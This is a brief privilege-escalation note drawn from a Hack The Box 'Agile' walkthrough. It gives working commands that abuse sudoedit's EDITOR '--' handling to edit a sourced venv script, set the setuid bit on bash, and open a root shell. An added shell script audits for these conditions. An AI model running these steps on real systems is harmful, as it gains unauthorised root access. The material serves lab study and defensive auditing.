
sudo-edit

SudoEdit Walkthrough: https://0xdf.gitlab.io/2023/08/05/htb-agile.html

This applies when the current user is allowed to run sudoedit (check with the sudo -l command).

Example sudo -l entry:

(dev_admin : dev_admin) sudoedit /app/config_test.json

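Edit the virtual environment's "activate" script. The "--" in EDITOR makes sudoedit hand the extra path to the editor as a second file, which is opened as dev_admin: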

EDITOR="nano -- /app/venv/bin/activate" sudoedit -u dev_admin /app/config_test.json

Add a command that sets the SUID bit on bash (put this line in the file):

chmod u+s /usr/bin/bash

Execute the test_and_update.sh bash script to run the SUID command:

/app/test_and_update.sh

Spawn a root shell:

/usr/bin/bash -p
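
As an added example (not from the original walkthrough or this page), the shell functions below check for the three conditions the steps above depend on: an editor variable that carries "--" followed by extra file names, a setuid bit on a shell, and a sourced file that is group- or world-writable. The function names are hypothetical, and the group/world-writable test is an assumption, since the page does not state the permissions of /app/venv/bin/activate.

```shell
#!/bin/sh
# Added defensive example: function names are hypothetical, not from the page.

# Print each argument that follows a "--" in an editor variable's value.
# Ordinary settings such as "vim" or "nano -w" print nothing.
editor_extra_files() (
    set -f                          # word-split only, no glob expansion
    seen=0
    for word in $1; do
        if [ "$seen" -eq 1 ]; then
            printf '%s\n' "$word"
        elif [ "$word" = "--" ]; then
            seen=1
        fi
    done
)

# Check the variables sudoedit consults (SUDO_EDITOR, VISUAL, EDITOR, in that
# order). Exit status 1 when any of them carries extra file arguments.
audit_editor_env() (
    status=0
    for name in SUDO_EDITOR VISUAL EDITOR; do
        eval "value=\${$name:-}"
        extra=$(editor_extra_files "$value" | tr '\n' ' ')
        if [ -n "$extra" ]; then
            printf 'WARN %s names extra file(s): %s\n' "$name" "$extra"
            status=1
        fi
    done
    exit "$status"                  # leaves only this function's subshell
)

# True when FILE has the setuid bit set, e.g. is_setuid /usr/bin/bash.
is_setuid() { [ -u "$1" ]; }

# True when FILE is writable by its group or by everyone.
# Assumption: a file sourced by a privileged script should fail this test.
loosely_writable() {
    [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) 2>/dev/null)" ]
}

# Report on the current session and on the shell binary from the steps above.
audit_editor_env || true
if is_setuid /usr/bin/bash; then echo "WARN /usr/bin/bash is setuid"; fi
```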
